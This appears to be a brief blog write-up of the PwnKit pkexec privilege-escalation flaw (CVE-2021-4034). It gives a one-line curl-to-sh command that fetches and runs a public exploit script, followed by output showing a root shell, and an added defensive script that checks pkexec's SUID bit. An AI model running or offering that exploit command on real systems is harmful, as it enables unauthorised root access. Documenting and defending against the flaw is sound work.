[CVE-2021-4034] Pkexec
The Qualys Research Team has discovered a memory corruption vulnerability in polkit's pkexec, a SUID-root program that is installed by default on every major Linux distribution.
This easily exploited vulnerability allows any unprivileged user to gain full root privileges.
Exploitation steps
➜ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run: “touch ~/.hushlogin” to hide this message)
root@kali:/tmp# whoami
root
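For the defensive side of the session above, this added example (not part of the original post or of the PwnKit project) checks whether a pkexec binary still carries the SUID-root bit that the escalation relies on. The function names, status strings and the default path /usr/bin/pkexec are assumptions made for this example.

```shell
#!/bin/sh
# Added example: classify a pkexec binary by whether it still has the
# set-user-ID bit that CVE-2021-4034 depends on.
# pkexec_status/report and the status strings are hypothetical names.

pkexec_status() {
    target=$1
    # Nothing to assess if pkexec is not installed at this path.
    if [ ! -e "$target" ]; then
        echo "absent"
        return 0
    fi
    # -u is the POSIX test for the set-user-ID bit.
    if [ ! -u "$target" ]; then
        echo "no-setuid"
        return 0
    fi
    # Numeric owner is the third field of ls -ln; uid 0 means SUID root.
    owner=$(ls -ldnL "$target" | awk '{print $3}')
    if [ "$owner" = "0" ]; then
        echo "setuid-root"
    else
        echo "setuid-nonroot"
    fi
}

report() {
    status=$(pkexec_status "$1")
    case $status in
        setuid-root)
            echo "$1: SUID root; exposed unless the installed polkit package is patched"
            echo "  temporary mitigation: chmod 0755 $1" ;;
        absent)
            echo "$1: not installed" ;;
        *)
            echo "$1: $status; does not run as root via the SUID bit" ;;
    esac
}

# Default path is an assumption; pass another path as the first argument.
report "${1:-/usr/bin/pkexec}"
```

Removing the SUID bit stops pkexec from working for legitimate use as well, so it is a stopgap until the distribution's patched polkit package is installed.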
References
- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
- https://github.com/ly4k/PwnKit
This post is licensed under CC BY 4.0 by the author.